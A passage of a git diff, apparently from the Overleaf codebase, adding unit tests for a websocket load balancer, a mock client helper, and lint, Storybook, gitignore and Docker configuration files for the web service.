duplicate client + { + id: 'client-id-4', + emit: (this.emit4 = sinon.stub()), + ol_context: { is_restricted_user: true }, + }, + ]), + } + const data = JSON.stringify({ + room_id: this.room_id, + message: (this.restrictedMessage = 'new-comment'), + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all (unique) clients in the room, who are not restricted', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + this.emit1 + .calledWith(this.restrictedMessage, ...Array.from(this.payload)) + .should.equal(true) + this.emit2 + .calledWith(this.restrictedMessage, ...Array.from(this.payload)) + .should.equal(true) + this.emit3.called.should.equal(false) // duplicate client should be ignored + return this.emit4.called.should.equal(false) + }) + }) // restricted client, should not be called + + describe('when emitting to all', function () { + beforeEach(function () { + this.io.sockets = { emit: (this.emit = sinon.stub()) } + const data = JSON.stringify({ + room_id: 'all', + message: this.message, + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all clients', function () { + return this.emit + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + }) + }) + + describe('when it should disconnect one of the clients', function () { + const targetUserId = 'bbb' + const message = 'userRemovedFromProject' + const payload = [`${targetUserId}`] + const clients = [ + { + id: 'client-id-1', + emit: sinon.stub(), + ol_context: { user_id: 'aaa' }, + disconnect: sinon.stub(), + }, + { + id: 'client-id-2', + emit: sinon.stub(), + ol_context: { user_id: `${targetUserId}` }, + disconnect: sinon.stub(), + }, + { + id: 'client-id-3', + emit: sinon.stub(), + ol_context: { user_id: 'ccc' }, + disconnect: sinon.stub(), + }, + ] + beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns(clients), + } + const data = JSON.stringify({ + room_id: this.room_id, + message, + payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + it('should disconnect the matching client, while sending message to other clients', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + + const [client1, client2, client3] = clients + + // disconnecting one client + client1.disconnect.called.should.equal(false) + client2.disconnect.called.should.equal(true) + client3.disconnect.called.should.equal(false) + + // emitting to remaining clients + client1.emit + .calledWith(message, ...Array.from(payload)) + .should.equal(true) + client2.emit.calledWith('project:access:revoked').should.equal(true) // disconnected client should get informative message + client3.emit + .calledWith(message, ...Array.from(payload)) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/helpers/MockClient.js b/services/real-time/test/unit/js/helpers/MockClient.js new file mode 100644 index 0000000..61cde89 --- /dev/null +++ b/services/real-time/test/unit/js/helpers/MockClient.js @@ -0,0 +1,23 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +let MockClient +const sinon = require('sinon') + +let idCounter = 0 + +module.exports = MockClient = class MockClient { + constructor() { + this.ol_context = {} + this.join = sinon.stub() + this.emit = sinon.stub() + this.disconnect = sinon.stub() + this.id = idCounter++ + this.publicId = idCounter++ + this.joinLeaveEpoch = 0 + } + + disconnect() {} +} diff --git a/services/real-time/tsconfig.json b/services/real-time/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/real-time/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/web/.eastrc b/services/web/.eastrc new file mode 100644 index 0000000..ac757c1 --- /dev/null +++ b/services/web/.eastrc @@ -0,0 +1,5 @@ +{ + "adapter": "./migrations/lib/adapter.mjs", + "migrationNumberFormat": "dateTime", + "migrationExtension": "mjs" +} diff --git a/services/web/.eslintignore b/services/web/.eslintignore new file mode 100644 index 0000000..673c2a7 --- /dev/null +++ b/services/web/.eslintignore @@ -0,0 +1,12 @@ +# NOTE: changing paths may require updating them in the Makefile too. +data/ +scripts/translations/.cache/ +node_modules +frontend/js/vendor +modules/**/frontend/js/vendor +/public/ +frontend/js/features/source-editor/lezer-latex/latex.mjs +frontend/js/features/source-editor/lezer-latex/latex.terms.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs +frontend/js/features/source-editor/hunspell/wasm/hunspell.mjs diff --git a/services/web/.eslintrc.js b/services/web/.eslintrc.js new file mode 100644 index 0000000..3c672de --- /dev/null +++ b/services/web/.eslintrc.js @@ -0,0 +1,495 @@ +module.exports = { + root: true, + parser: '@typescript-eslint/parser', + extends: [ + 'eslint:recommended', + 'plugin:@typescript-eslint/recommended', + 'standard', + 'prettier', + ], + plugins: ['@overleaf'], + env: { + es2020: true, + }, + settings: { + // Tell eslint-plugin-react to detect which version of React we are using + react: { + version: 'detect', + }, + }, + rules: { + 'no-constant-binary-expression': 'error', + + // do not allow importing of implicit dependencies. + 'import/no-extraneous-dependencies': 'error', + + '@overleaf/prefer-kebab-url': 'error', + + // disable some TypeScript rules + '@typescript-eslint/no-var-requires': 'off', + '@typescript-eslint/no-unused-vars': 'off', + '@typescript-eslint/no-empty-function': 'off', + '@typescript-eslint/no-explicit-any': 'off', + '@typescript-eslint/no-this-alias': 'off', + '@typescript-eslint/no-non-null-assertion': 'off', + '@typescript-eslint/ban-ts-comment': 'off', + + 'no-use-before-define': 'off', + '@typescript-eslint/no-use-before-define': [ + 'error', + { functions: false, classes: false, variables: false }, + ], + 'react-hooks/exhaustive-deps': [ + 'warn', + { + additionalHooks: '(useCommandProvider)', + }, + ], + }, + overrides: [ + // NOTE: changing paths may require updating them in the Makefile too. + { + // Node + files: [ + '**/app/src/**/*.{js,mjs}', + 'app.{js,mjs}', + 'i18next-scanner.config.js', + 'scripts/**/*.{js,mjs}', + 'webpack.config*.js', + ], + env: { + node: true, + }, + }, + { + // Test specific rules + files: ['**/test/**/*.*'], + plugins: ['mocha', 'chai-expect', 'chai-friendly'], + env: { + mocha: true, + }, + rules: { + // mocha-specific rules + 'mocha/handle-done-callback': 'error', + 'mocha/no-exclusive-tests': 'error', + 'mocha/no-global-tests': 'error', + 'mocha/no-identical-title': 'error', + 'mocha/no-nested-tests': 'error', + 'mocha/no-pending-tests': 'error', + 'mocha/no-skipped-tests': 'error', + 'mocha/no-mocha-arrows': 'error', + + // Swap the no-unused-expressions rule with a more chai-friendly one + 'no-unused-expressions': 'off', + 'chai-friendly/no-unused-expressions': 'error', + + // chai-specific rules + 'chai-expect/missing-assertion': 'error', + 'chai-expect/terminating-properties': 'error', + + // prefer-arrow-callback applies to all callbacks, not just ones in mocha tests. + // we don't enforce this at the top-level - just in tests to manage `this` scope + // based on mocha's context mechanism + 'mocha/prefer-arrow-callback': 'error', + + '@typescript-eslint/no-unused-expressions': 'off', + }, + }, + { + // ES specific rules + files: [ + '**/app/src/**/*.mjs', + 'modules/*/index.mjs', + 'app.mjs', + 'scripts/**/*.mjs', + 'migrations/**/*.mjs', + ], + excludedFiles: [ + // migration template file + 'migrations/lib/template.mjs', + ], + parserOptions: { + sourceType: 'module', + }, + plugins: ['unicorn'], + rules: { + 'import/no-unresolved': [ + 'error', + { + // eslint-plugin-import does not support exports directive in package.json + // https://github.com/import-js/eslint-plugin-import/issues/1810 + ignore: ['^p-queue$'], + }, + ], + 'import/extensions': [ + 'error', + 'ignorePackages', + { + js: 'always', + mjs: 'always', + }, + ], + 'unicorn/prefer-module': 'error', + 'unicorn/prefer-node-protocol': 'error', + }, + }, + { + // Backend specific rules + files: ['**/app/src/**/*.{js,mjs}', 'app.{js,mjs}'], + parserOptions: { + tsconfigRootDir: __dirname, + project: './tsconfig.backend.json', + }, + rules: { + // do not allow importing of implicit dependencies. + 'import/no-extraneous-dependencies': [ + 'error', + { + // do not allow importing of devDependencies. + devDependencies: false, + }, + ], + 'no-restricted-syntax': [ + 'error', + // do not allow node-fetch in backend code + { + selector: + "CallExpression[callee.name='require'] > .arguments[value='node-fetch']", + message: + 'Requiring node-fetch is not allowed in production services, please use fetch-utils.', + }, + // mongoose populate must set fields to populate + { + selector: + "CallExpression[callee.property.name='populate'][arguments.length<2]", + message: + "Populate without a second argument returns the whole document. Use populate('field',['prop1','prop2']) instead", + }, + // Require `new` when constructing ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.name='ObjectId'], CallExpression[callee.property.name='ObjectId']", + message: + 'Construct ObjectId with `new ObjectId()` instead of `ObjectId()`', + }, + // Require `new` when mapping a list of ids to a list of ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.property.name='map'] Identifier[name='ObjectId']:first-child, CallExpression[callee.property.name='map'] MemberExpression[property.name='ObjectId']:first-child", + message: + "Don't map ObjectId directly. Use `id => new ObjectId(id)` instead", + }, + // Catch incorrect usage of `await db.collection.find()` + { + selector: + "AwaitExpression > CallExpression > MemberExpression[property.name='find'][object.object.name='db']", + message: + 'Mongo find returns a cursor not a promise, use `for await (const result of cursor)` or `.toArray()` instead.', + }, + ], + '@typescript-eslint/no-floating-promises': [ + 'error', + { checkThenables: true }, + ], + }, + }, + { + // Backend scripts specific rules + files: ['**/scripts/**/*.js'], + rules: { + 'no-restricted-syntax': [ + 'error', + // Require `new` when constructing ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.name='ObjectId'], CallExpression[callee.property.name='ObjectId']", + message: + 'Construct ObjectId with `new ObjectId()` instead of `ObjectId()`', + }, + // Require `new` when mapping a list of ids to a list of ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.property.name='map'] Identifier[name='ObjectId']:first-child, CallExpression[callee.property.name='map'] MemberExpression[property.name='ObjectId']:first-child", + message: + "Don't map ObjectId directly. Use `id => new ObjectId(id)` instead", + }, + // Catch incorrect usage of `await db.collection.find()` + { + selector: + "AwaitExpression > CallExpression > MemberExpression[property.name='find'][object.object.name='db']", + message: + 'Mongo find returns a cursor not a promise, use `for await (const result of cursor)` or `.toArray()` instead.', + }, + ], + }, + }, + { + // Cypress specific rules + files: [ + 'cypress/**/*.{js,jsx,ts,tsx}', + '**/test/frontend/**/*.spec.{js,jsx,ts,tsx}', + ], + extends: ['plugin:cypress/recommended'], + }, + { + // Frontend test specific rules + files: ['**/frontend/**/*.test.{js,jsx,ts,tsx}'], + plugins: ['testing-library'], + extends: ['plugin:testing-library/react'], + rules: { + 'testing-library/no-await-sync-events': 'off', + 'testing-library/no-await-sync-queries': 'off', + 'testing-library/no-container': 'off', + 'testing-library/no-node-access': 'off', + 'testing-library/no-render-in-lifecycle': 'off', + 'testing-library/no-wait-for-multiple-assertions': 'off', + 'testing-library/no-wait-for-side-effects': 'off', + 'testing-library/prefer-query-by-disappearance': 'off', + 'testing-library/prefer-screen-queries': 'off', + 'testing-library/render-result-naming-convention': 'off', + }, + }, + { + // Frontend specific rules + files: [ + '**/frontend/js/**/*.{js,jsx,ts,tsx}', + '**/frontend/stories/**/*.{js,jsx,ts,tsx}', + '**/*.stories.{js,jsx,ts,tsx}', + '**/test/frontend/**/*.{js,jsx,ts,tsx}', + '**/test/frontend/components/**/*.spec.{js,jsx,ts,tsx}', + ], + env: { + browser: true, + }, + parserOptions: { + sourceType: 'module', + }, + plugins: ['jsx-a11y'], + extends: [ + 'plugin:react/recommended', + 'plugin:react-hooks/recommended', + 'plugin:jsx-a11y/recommended', + 'standard-jsx', + 'prettier', + ], + globals: { + __webpack_public_path__: true, + $: true, + ga: true, + }, + rules: { + // TODO: remove once https://github.com/standard/eslint-config-standard-react/issues/68 (support eslint@8) is fixed. + // START: inline standard-react rules + // "react/jsx-no-bind": ["error", { + // "allowArrowFunctions": true, + // "allowBind": false, + // "ignoreRefs": true + // },], + 'react/no-did-update-set-state': 'error', + 'react/no-unused-prop-types': 'error', + 'react/prop-types': 'error', + // "react/react-in-jsx-scope": "error", + // END: inline standard-react rules + + 'react/no-unknown-property': [ + 'error', + { + ignore: ['dnd-container', 'dropdown-toggle'], + }, + ], + + 'react/jsx-no-target-blank': [ + 'error', + { + allowReferrer: true, + }, + ], + // Prevent usage of legacy string refs + 'react/no-string-refs': 'error', + + // Prevent curly braces around strings (as they're unnecessary) + 'react/jsx-curly-brace-presence': [ + 'error', + { + props: 'never', + children: 'never', + }, + ], + + // Don't import React for JSX; the JSX runtime is added by a Babel plugin + 'react/react-in-jsx-scope': 'off', + 'react/jsx-uses-react': 'off', + + // Allow functions as JSX props + 'react/jsx-no-bind': 'off', // TODO: fix occurrences and re-enable this + + // Fix conflict between prettier & standard by overriding to prefer + // double quotes + 'jsx-quotes': ['error', 'prefer-double'], + + // Override weird behaviour of jsx-a11y label-has-for (says labels must be + // nested *and* have for/id attributes) + 'jsx-a11y/label-has-for': [ + 'error', + { + required: { + some: ['nesting', 'id'], + }, + }, + ], + + // Require .jsx or .tsx file extension when using JSX + 'react/jsx-filename-extension': [ + 'error', + { + extensions: ['.jsx', '.tsx'], + }, + ], + 'no-restricted-syntax': [ + 'error', + // prohibit direct calls to methods of window.localStorage + { + selector: + "CallExpression[callee.object.object.name='window'][callee.object.property.name='localStorage']", + message: + 'Modify location via customLocalStorage instead of calling window.localStorage methods directly', + }, + ], + }, + }, + { + // Sorting for Meta + files: ['frontend/js/utils/meta.ts'], + rules: { + '@typescript-eslint/member-ordering': [ + 'error', + { interfaces: { order: 'alphabetically' } }, + ], + }, + }, + { + // React component specific rules + // + files: [ + '**/frontend/js/**/components/**/*.{js,jsx,ts,tsx}', + '**/frontend/js/**/hooks/**/*.{js,jsx,ts,tsx}', + ], + rules: { + '@overleaf/no-unnecessary-trans': 'error', + '@overleaf/should-unescape-trans': 'error', + + // https://astexplorer.net/ + 'no-restricted-syntax': [ + 'error', + // prohibit direct calls to methods of window.location + { + selector: + "CallExpression[callee.object.object.name='window'][callee.object.property.name='location']", + message: + 'Modify location via useLocation instead of calling window.location methods directly', + }, + // prohibit assignment to window.location + { + selector: + "AssignmentExpression[left.object.name='window'][left.property.name='location']", + message: + 'Modify location via useLocation instead of calling window.location methods directly', + }, + // prohibit assignment to window.location.href + { + selector: + "AssignmentExpression[left.object.object.name='window'][left.object.property.name='location'][left.property.name='href']", + message: + 'Modify location via useLocation instead of calling window.location methods directly', + }, + // prohibit using lookbehinds due to incidents with Safari simply crashing when the script is parsed + { + selector: 'Literal[regex.pattern=/\\(\\?<[!=]/]', + message: 'Lookbehind is not supported in older Safari versions.', + }, + // prohibit direct calls to methods of window.localStorage + // NOTE: this rule is also defined for all frontend files, but those rules are overriden by the React component-specific config + { + selector: + "CallExpression[callee.object.object.name='window'][callee.object.property.name='localStorage']", + message: + 'Modify location via customLocalStorage instead of calling window.localStorage methods directly', + }, + ], + }, + }, + // React + TypeScript-specific rules + { + files: ['**/*.tsx'], + rules: { + 'react/prop-types': 'off', + 'no-undef': 'off', + }, + }, + // TypeScript-specific rules + { + files: ['**/*.ts'], + rules: { + 'no-undef': 'off', + }, + }, + // JavaScript-specific rules + { + files: ['**/*.js'], + rules: { + '@typescript-eslint/no-require-imports': 'off', + }, + }, + { + files: ['scripts/ukamf/*.js'], + rules: { + // Do not allow importing of any dependencies unless specified in either + // - web/package.json + // - web/scripts/ukamf/package.json + 'import/no-extraneous-dependencies': [ + 'error', + { packageDir: ['.', 'scripts/ukamf'] }, + ], + }, + }, + { + files: ['scripts/learn/checkSanitize/*.js'], + rules: { + // The checkSanitize script is used in the dev-env only. + 'import/no-extraneous-dependencies': [ + 'error', + { + devDependencies: true, + packageDir: ['.', '../../'], + }, + ], + }, + }, + { + files: [ + // Backend: Use @overleaf/logger + // Docs: https://manual.dev-overleaf.com/development/code/logging/#structured-logging + '**/app/**/*.{js,cjs,mjs}', + 'app.{js,mjs}', + 'modules/*/*.{js,mjs}', + // Frontend: Prefer debugConsole over bare console + // Docs: https://manual.dev-overleaf.com/development/code/logging/#frontend + '**/frontend/**/*.{js,jsx,ts,tsx}', + // Tests + '**/test/**/*.{js,cjs,mjs,jsx,ts,tsx}', + ], + excludedFiles: [ + // Allow console logs in scripts + '**/scripts/**/*.js', + // Allow console logs in stories + '**/stories/**/*.{js,jsx,ts,tsx}', + // Workers do not have access to the search params for enabling ?debug=true. + // self.location.url is the URL of the worker script. + '*.worker.{js,ts}', + ], + rules: { + 'no-console': 'error', + }, + }, + ], +} diff --git a/services/web/.gitignore b/services/web/.gitignore new file mode 100644 index 0000000..8bd23b7 --- /dev/null +++ b/services/web/.gitignore @@ -0,0 +1,103 @@ +# Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? +Thumbs.db + +# allow "icons" +![Ii]cons + +node_modules/* +data/* +coverage + +cookies.txt +requestQueueWorker.js +TpdsWorker.js +BackgroundJobsWorker.js +UserAndProjectPopulator.coffee + +public/manifest.json + +public/js +public/minjs +public/stylesheets +public/fonts +public/images + +Gemfile.lock + +*.swp +.DS_Store + +docker-shared.yml + +config/*.coffee +!config/settings.defaults.coffee +!config/settings.webpack.coffee +config/*.js +!config/settings.defaults.js +!config/settings.webpack.js +!config/settings.overrides.saas.js +!config/settings.overrides.server-pro.js + +modules/**/Makefile + +# Precompiled pug files +**/app/views/**/*.js + +# Sentry secrets file (injected by CI) +.sentryclirc + +# via dev-environment +.npmrc + +# Intellij +.idea +.run + +# Cypress +cypress/screenshots/ +cypress/videos/ +cypress/downloads/ +cypress/results/ + +# Ace themes for conversion +frontend/js/features/source-editor/themes/ace/ + +# Compiled parser files +frontend/js/features/source-editor/lezer-latex/latex.mjs +frontend/js/features/source-editor/lezer-latex/latex.terms.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs + +!**/fixtures/**/*.log diff --git a/services/web/.nvmrc b/services/web/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/web/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/web/.prettierignore b/services/web/.prettierignore new file mode 100644 index 0000000..f4be187 --- /dev/null +++ b/services/web/.prettierignore @@ -0,0 +1,14 @@ +# NOTE: changing paths may require updating them in the Makefile too. +data/ +scripts/translations/.cache/ +node_modules +frontend/js/vendor +modules/**/frontend/js/vendor +public/js +public/minjs +frontend/stylesheets/components/nvd3.less +frontend/js/features/source-editor/lezer-latex/latex.mjs +frontend/js/features/source-editor/lezer-latex/latex.terms.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs +frontend/js/features/source-editor/hunspell/wasm/hunspell.mjs diff --git a/services/web/.prettierrc b/services/web/.prettierrc new file mode 100644 index 0000000..13e3186 --- /dev/null +++ b/services/web/.prettierrc @@ -0,0 +1,9 @@ +{ + "arrowParens": "avoid", + "jsxSingleQuote": false, + "semi": false, + "singleQuote": true, + "trailingComma": "es5", + "tabWidth": 2, + "useTabs": false +} diff --git a/services/web/.storybook/main.ts b/services/web/.storybook/main.ts new file mode 100644 index 0000000..ac1a922 --- /dev/null +++ b/services/web/.storybook/main.ts @@ -0,0 +1,129 @@ +import type { StorybookConfig } from '@storybook/react-webpack5' +import path from 'node:path' +import MiniCssExtractPlugin from 'mini-css-extract-plugin' + +const rootDir = path.resolve(__dirname, '..') + +// NOTE: must be set before webpack config is imported +process.env.OVERLEAF_CONFIG = path.join(rootDir, 'config/settings.webpack.js') + +function getAbsolutePath(value: string): any { + return path.dirname(require.resolve(path.join(value, 'package.json'))) +} + +const config: StorybookConfig = { + core: { + disableTelemetry: true, + }, + staticDirs: [path.join(rootDir, 'public')], + stories: [ + path.join(rootDir, 'frontend/stories/**/*.stories.{js,jsx,ts,tsx}'), + path.join(rootDir, 'modules/**/stories/**/*.stories.{js,jsx,ts,tsx}'), + ], + addons: [ + getAbsolutePath('@storybook/addon-links'), + getAbsolutePath('@storybook/addon-essentials'), + getAbsolutePath('@storybook/addon-interactions'), + getAbsolutePath('@storybook/addon-a11y'), + getAbsolutePath('@storybook/addon-webpack5-compiler-babel'), + { + name: getAbsolutePath('@storybook/addon-styling-webpack'), + options: { + rules: [ + { + test: /\.css$/, + use: [ + { loader: MiniCssExtractPlugin.loader }, + { loader: 'css-loader' }, + ], + }, + { + test: /\.less$/, + use: [ + { loader: MiniCssExtractPlugin.loader }, + { loader: 'css-loader' }, + { loader: 'less-loader' }, + ], + }, + { + // Pass Sass files through sass-loader/css-loader/mini-css-extract- + // plugin (note: run in reverse order) + test: /\.s[ac]ss$/, + use: [ + // Allows the CSS to be extracted to a separate .css file + { loader: MiniCssExtractPlugin.loader }, + // Resolves any CSS dependencies (e.g. url()) + { loader: 'css-loader' }, + // Resolve relative paths sensibly in SASS + { loader: 'resolve-url-loader' }, + { + // Runs autoprefixer on CSS via postcss + loader: 'postcss-loader', + options: { + postcssOptions: { + plugins: ['autoprefixer'], + }, + }, + }, + // Compiles Sass to CSS + { + loader: 'sass-loader', + options: { sourceMap: true }, // sourceMap: true is required for resolve-url-loader + }, + ], + }, + ], + plugins: [new MiniCssExtractPlugin()], + }, + }, + ], + framework: { + name: getAbsolutePath('@storybook/react-webpack5'), + options: {}, + }, + docs: { + autodocs: 'tag', + }, + babel: (options: Record<string, any>) => { + return { + ...options, + plugins: [ + // ensure that TSX files are transformed before other plugins run + ['@babel/plugin-transform-typescript', { isTSX: true }], + ...(options.plugins ?? []), + ], + } + }, + webpackFinal: storybookConfig => { + return { + ...storybookConfig, + resolve: { + ...storybookConfig.resolve, + fallback: { + ...storybookConfig.resolve?.fallback, + fs: false, + os: false, + module: false, + tty: require.resolve('tty-browserify'), + }, + extensions: ['.js', '.jsx', '.mjs', '.ts', '.tsx', '.json'], + alias: { + ...storybookConfig.resolve?.alias, + // custom prefixes for import paths + '@': path.join(rootDir, 'frontend/js/'), + }, + }, + module: { + ...storybookConfig.module, + rules: (storybookConfig.module?.rules ?? []).concat({ + test: /\.wasm$/, + type: 'asset/resource', + generator: { + filename: 'js/[name]-[contenthash][ext]', + }, + }), + }, + } + }, +} +export default config diff --git a/services/web/.storybook/manager.css b/services/web/.storybook/manager.css new file mode 100644 index 0000000..7a99a82 --- /dev/null +++ b/services/web/.storybook/manager.css @@ -0,0 +1,3 @@ +.sidebar-container a[title='Overleaf'] { + max-width: 100px; +} diff --git a/services/web/.storybook/manager.ts b/services/web/.storybook/manager.ts new file mode 100644 index 0000000..f5bdff6 --- /dev/null +++ b/services/web/.storybook/manager.ts @@ -0,0 +1,15 @@ +import { addons } from '@storybook/manager-api' +import { create } from '@storybook/theming/create' + +import './manager.css' + +import brandImage from '../public/img/ol-brand/overleaf.svg' + +const theme = create({ + base: 'light', + brandTitle: 'Overleaf', + brandUrl: 'https://www.overleaf.com', + brandImage, +}) + +addons.setConfig({ theme }) diff --git a/services/web/.storybook/preview.tsx b/services/web/.storybook/preview.tsx new file mode 100644 index 0000000..e3838a6 --- /dev/null +++ b/services/web/.storybook/preview.tsx @@ -0,0 +1,173 @@ +import type { Preview } from '@storybook/react' + +// Storybook does not (currently) support async loading of "stories". Therefore +// the strategy in frontend/js/i18n.ts does not work (because we cannot wait on +// the promise to resolve). +// Therefore we have to use the synchronous method for configuring +// react-i18next. Because this, we can only hard-code a single language. +import i18n from 'i18next' +import { initReactI18next } from 'react-i18next' +// @ts-ignore +import en from '../../../services/web/locales/en.json' + +function resetMeta() { + window.metaAttributesCache = new Map() + window.metaAttributesCache.set('ol-i18n', { currentLangCode: 'en' }) + window.metaAttributesCache.set('ol-ExposedSettings', { + adminEmail: 'placeholder@example.com', + appName: 'Overleaf', + cookieDomain: '.overleaf.stories', + dropboxAppName: 'Overleaf-Stories', + emailConfirmationDisabled: false, + enableSubscriptions: true, + hasAffiliationsFeature: false, + hasLinkUrlFeature: true, + hasLinkedProjectFileFeature: true, + hasLinkedProjectOutputFileFeature: true, + hasSamlFeature: true, + ieeeBrandId: 15, + isOverleaf: true, + labsEnabled: true, + maxEntitiesPerProject: 10, + maxUploadSize: 5 * 1024 * 1024, + recaptchaDisabled: { + invite: true, + login: true, + passwordReset: true, + register: true, + addEmail: true, + }, + sentryAllowedOriginRegex: '', + siteUrl: 'http://localhost', + templateLinks: [], + textExtensions: [ + 'tex', + 'latex', + 'sty', + 'cls', + 'bst', + 'bib', + 'bibtex', + 'txt', + 'tikz', + 'mtx', + 'rtex', + 'md', + 'asy', + 'lbx', + 'bbx', + 'cbx', + 'm', + 'lco', + 'dtx', + 'ins', + 'ist', + 'def', + 'clo', + 'ldf', + 'rmd', + 'lua', + 'gv', + 'mf', + 'lhs', + 'mk', + 'xmpdata', + 'cfg', + 'rnw', + 'ltx', + 'inc', + ], + editableFilenames: ['latexmkrc', '.latexmkrc', 'makefile', 'gnumakefile'], + validRootDocExtensions: ['tex', 'Rtex', 'ltx', 'Rnw'], + fileIgnorePattern: + '**/{{__MACOSX,.git,.texpadtmp,.R}{,/**},.!(latexmkrc),*.{dvi,aux,log,toc,out,pdfsync,synctex,synctex(busy),fdb_latexmk,fls,nlo,ind,glo,gls,glg,bbl,blg,doc,docx,gz,swp}}', + projectUploadTimeout: 12000, + }) +} + +i18n.use(initReactI18next).init({ + lng: 'en', + + // still using the v3 plural suffixes + compatibilityJSON: 'v3', + + resources: { + en: { translation: en }, + }, + + react: { + useSuspense: false, + transSupportBasicHtmlNodes: false, + }, + + interpolation: { + prefix: '__', + suffix: '__', + unescapeSuffix: 'HTML', + skipOnVariables: true, + escapeValue: false, + defaultVariables: { + appName: 'Overleaf', + }, + }, +}) + +const preview: Preview = { + parameters: { + // Automatically mark prop-types like onClick, onToggle, etc as Storybook + // "actions", so that they are logged in the Actions pane at the bottom of the + // viewer + actions: { argTypesRegex: '^on.*' }, + docs: { + // render stories in iframes, to isolate modals + inlineStories: false, + }, + }, + globalTypes: { + theme: { + name: 'Theme', + description: 'Editor theme', + defaultValue: 'main-', + toolbar: { + icon: 'circlehollow', + items: [ + { value: 'main-', title: 'Default' }, + { value: 'main-light-', title: 'Light' }, + ], + }, + }, + }, + loaders: [ + async () => { + return { + mainStyle: await import( + // @ts-ignore + `!!to-string-loader!css-loader!resolve-url-loader!sass-loader!../../../services/web/frontend/stylesheets/bootstrap-5/main-style.scss` + ), + } + }, + ], + decorators: [ + (Story, context) => { + const { mainStyle } = context.loaded + + resetMeta() + + return ( + <div + data-theme={ + context.globals.theme === 'main-light-' ? 'light' : 'default' + } + > + {mainStyle && <style>{mainStyle.default}</style>} + <Story {...context} /> + </div> + ) + }, + ], +} + +export default preview + +// Populate meta for top-level access in modules on import +resetMeta() diff --git a/services/web/.storybook/utils/with-split-tests.tsx b/services/web/.storybook/utils/with-split-tests.tsx new file mode 100644 index 0000000..0a7ee0b --- /dev/null +++ b/services/web/.storybook/utils/with-split-tests.tsx @@ -0,0 +1,34 @@ +import type { Meta } from '@storybook/react' +import _ from 'lodash' +import { SplitTestContext } from '../../frontend/js/shared/context/split-test-context' + +export const splitTestsArgTypes = { + // to be able to use this utility, you need to add the argTypes for each split test in this object + // Check the original implementation for an example: https://github.com/overleaf/internal/pull/17809 +} + +export const withSplitTests = ( + story: Meta, + splitTests: (keyof typeof splitTestsArgTypes)[] = [] +): Meta => { + return { + ...story, + argTypes: { ...story.argTypes, ..._.pick(splitTestsArgTypes, splitTests) }, + decorators: [ + (Story, { args }) => { + const splitTestVariants = _.pick(args, splitTests) + const value = { splitTestVariants, splitTestInfo: {} } + return ( + <SplitTestContext.Provider value={value}> + <Story /> + </SplitTestContext.Provider> + ) + }, + ...(story.decorators + ? Array.isArray(story.decorators) + ? story.decorators + : [story.decorators] + : []), + ], + } +} diff --git a/services/web/.stylelintrc.json b/services/web/.stylelintrc.json new file mode 100644 index 0000000..09ff0b3 --- /dev/null +++ b/services/web/.stylelintrc.json @@ -0,0 +1,10 @@ +{ + "extends": ["stylelint-config-standard-scss"], + "rules": { + "function-url-quotes": null, + "no-descending-specificity": null, + "scss/at-extend-no-missing-placeholder": null, + "scss/operator-no-newline-after": null, + "property-no-vendor-prefix": [true, { "ignoreProperties": ["mask-image"] }] + } +} diff --git a/services/web/.vscode/settings.json b/services/web/.vscode/settings.json new file mode 100644 index 0000000..133731e --- /dev/null +++ b/services/web/.vscode/settings.json @@ -0,0 +1,7 @@ +{ + "files.exclude": { + "node_modules": true, + "data": true + }, + "cSpell.words": ["docstore", "Tpds"] +} diff --git a/services/web/Dockerfile b/services/web/Dockerfile new file mode 100644 index 0000000..4f5d2e5 --- /dev/null +++ b/services/web/Dockerfile @@ -0,0 +1,83 @@ +# the base image is suitable for running web with /overleaf/services/web bind +# mounted +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/web + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +RUN mkdir -p /overleaf/services/web/data/dumpFolder \ + && mkdir -p /overleaf/services/web/data/logs \ + && mkdir -p /overleaf/services/web/data/pdf \ + && mkdir -p /overleaf/services/web/data/uploads \ + && mkdir -p /overleaf/services/web/data/zippedProjects \ + && mkdir -p /overleaf/services/web/data/projectHistories \ + && chmod -R 0755 /overleaf/services/web/data \ + && chown -R node:node /overleaf/services/web/data + + +# the deps image is used for caching npm ci +FROM base AS deps-prod + +COPY package.json package-lock.json /overleaf/ +COPY services/web/package.json /overleaf/services/web/ +COPY libraries/ /overleaf/libraries/ 